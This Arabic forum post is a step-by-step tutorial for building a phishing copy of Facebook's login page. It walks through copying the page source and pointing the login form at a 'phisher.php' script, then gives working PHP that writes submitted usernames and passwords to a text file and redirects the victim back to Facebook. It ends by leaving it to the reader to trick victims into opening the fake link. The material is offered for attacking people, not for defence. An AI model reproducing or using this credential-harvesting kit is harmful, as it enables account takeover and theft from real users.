اسهل طريقة وبخطوات واضحة لصناعة صفحة مزورة لاي موقع يخطر ببالك

[3RaQi]

السلام عليكم

هذا اول درس اقوم بشرحة ... اتمنى ان اوفق في ايصال الفكرة ...



حتى تصنع صفحة مزورة لاي موقع ما يجب ان تمتلك موقع خاص بك على الانترنت وكثيرة هي المواقع

واني لهذا الخصوص انصح بهذا الموقع

[]


الشرح راح اعمله على السيرفر المحلي على جهازي واطبق الشرح على موقع الفيس بوك....


اول شي نفتح الفيس بوك


ثاني شي نطلع السورس كود للصفحة ...

اما بالضغط على CTRL-U اذا كان متصفحك فايرفوكس
او كلك يمين بالصفحة وتختار view source في حالة الانترنت اكسبلورر....


ونبحث عن الكود التالي

كود PHP:

form method="POST" 
action="https://www.facebook.com/login.php?login_attempt=1" 


وظيفة هذا الكود هوة .... يوضح انه المعلومات الي راح يدخلها العضو تروح لهذا الرابط للتاكد من صحتها ودخول العضو بنجاح للموقع اذا كانت صحيحة...

الي راح نسويه وبكل بساطة نغير هذا اتجاه هالمعلومات الى موقعنة الشخصي وبهذا نكون اخترقنة حساب الضحية .....

نغير الكود اعلاه الى .. على سبيل المثال ...

كود PHP:

form method="get" action="phisher.php" 


وهذا معناه ارسل هالمعلومات للمللف phisher.php المخزون على موقعنه وهوة طبعا هذا ملف الي راح يعطي الاكشن بخزن اليوزر والباسورد بملف TEXT في موقعنا بعد محاولة الضحية لتسجيل الدخول..


بعد اتمام التغيير تنسخ الكود وتضعه في ملف وليكن بامتداد php
فانا سميته login.php


اما الكود الخاص بالملف phisher.php هو :-

كود PHP:


<?php
header("Location: http://www.facebook.com");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

طبعا تستطيع تغير اسماء الملفات مع مراعاة تغيرها بلكود ايضا وايضا تغير اسماء المواقع للمواقع التي تستهدفها ...


لهنا الشرح انتهى باقي صور تطبيق المثال...


اول شي صورة للملفات الموجودة في السيرفر ....









طبعا الباقي انتة وشطارتك شلون تخلي الضحية يدخل من الرابط الخاص بيك ... ملاحظة رابط login.php هو الي يتم ارسالة للضحية ....


الصورة الثانية توضح بعد فتح الضحية للرابط وتسجيل الدخول....








بعد الدخول سيتكون ملف بالموقع جديد اسمه password.txt

به اليوزر والباسورد كما في الصورة ادناه







تحيتي للجميع ......